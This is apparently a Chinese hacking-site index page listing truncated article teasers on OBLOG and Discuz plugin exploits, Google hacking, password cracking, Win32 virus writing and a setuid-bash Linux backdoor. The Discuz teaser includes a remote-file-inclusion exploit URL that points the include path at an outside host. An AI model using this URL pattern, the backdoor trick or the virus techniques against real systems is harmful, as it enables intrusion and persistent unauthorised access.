黑客生涯

OBLOG4.0 OBLOG4.5漏洞利用分析

来源:DeepenStudy 漏洞文件:js.asp % Dimoblog setoblog=newclass_sys oblog.autoupdate=False oblog.start dimjs_blogurl,n js_blogurl=Trim(oblog.CacheConfig(3)) n=CInt(Request(”n”)) ifn=0thenn=1 selectcaseCInt(Request(”j”)) case1...

黑客生涯

恶意代码与网络安全

浏览网页会感染“病毒”,浏览网页会感染木马,你相信吗?大约半年前就有人使用这种技术来进行攻击了!恶意代码具有比较大的隐蔽性,到目前为止,还没有什么病毒防火墙能很好...

黑客生涯

利用Google作黑客攻击的原理

技术天地:GoogleHacking是利用Google的搜索引擎快速查找存在脆弱性的主机以及包含敏感数据的信息,最近这种以前由黑客手动进行操作的攻击手段可以通过一种新的蠕虫病毒来自动完成。...

黑客生涯

discuz许愿池插件远程包含漏洞

许愿池插件的wish.php文件出的问题: require$discuz_root.'./include/discuzcode.func.php'; 手工利用方法: 远程包含漏洞,变量discuz_root过滤不严,利用方法: http://url/wish.php?discuz_root=http://www.neeao....

黑客生涯

密码破解全教程

在日常的计算机操作中,我们随时随地都离不开密码——开机要使用CMOS密码、进Windows 98要使用用户密码、编辑Word文档要设置文档密码……,所有这些都为用户的数据安全提供了必要的...

黑客生涯

Win32下病毒设计入门

Win32下病毒设计入门 本文假定你对dos下的病毒和386PM有一定的了解。 1、感染任何一个病毒都需要有寄主,把病毒代码加入寄主程序中 (伴侣病毒除外)。 以下说明如何将病毒代码嵌入...

黑客生涯

超初级的linux后门制作方法

众所周知,Linux的文件权限如: 777;666等,其实只要在相应的文件上加上UID的权限,就可以用到加权限人的身份去运行这个文件。所以我们只需要将bash复制出来到另一个地方,然后用ro...